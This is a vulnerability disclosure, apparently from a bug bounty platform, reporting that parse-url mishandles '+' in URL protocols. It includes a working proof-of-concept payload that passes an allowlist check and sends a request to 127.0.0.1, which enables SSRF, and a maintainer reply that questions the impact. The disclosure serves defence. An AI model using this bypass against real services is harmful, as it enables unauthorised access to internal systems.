Malicious usage of '+' in protocol can lead to whitelist bypasses in ionicabizau/parse-url
Reported on
Mar 13th 2022
Description
Malicious usage of '+' in protocol can lead to whitelist bypasses.
Proof of Concept
The following PoC shows how, if parse-url is used to check the resource of a URL against a whitelist, the whitelist check for google.com can be bypassed and the standard HTTP client in NodeJS can then be convinced to make a request to 127.0.0.1.
const parse = require('parse-url')
const http = require('http')
// parse-url reports the resource as 'google.com' for this URL
const url = parse("http:+@127.0.0.1://google.com")
if (url.resource === "google.com") {
  // the allowlist check passes, but the request actually goes to 127.0.0.1
  http.get(url.href)
}
This is because parse-url only locates the resource section after '://', whereas other URL parsers such as the WHATWG URL parser end the resource section at the first ':' character. parse-url's output for the PoC URL is:
{
protocols: [ 'http:', '@127.0.0.1' ],
protocol: 'http:',
port: null,
resource: 'google.com',
user: '',
pathname: '',
hash: '',
search: '',
href: 'http:+@127.0.0.1://google.com',
query: [Object: null prototype] {}
}
Impact
This vulnerability can be used to bypass blacklist/whitelist checks on URLs, enabling SSRF.
Hi Haxatron! The impact of this parsing issue is unclear and I'm not sure if this would constitute a vulnerability. For the proposed impact to be true, the parser would need to indicate that data should be loaded from one resource, whilst providing a different resource to a potential whitelist. How can this be?
Adjusting the severity until this is clear.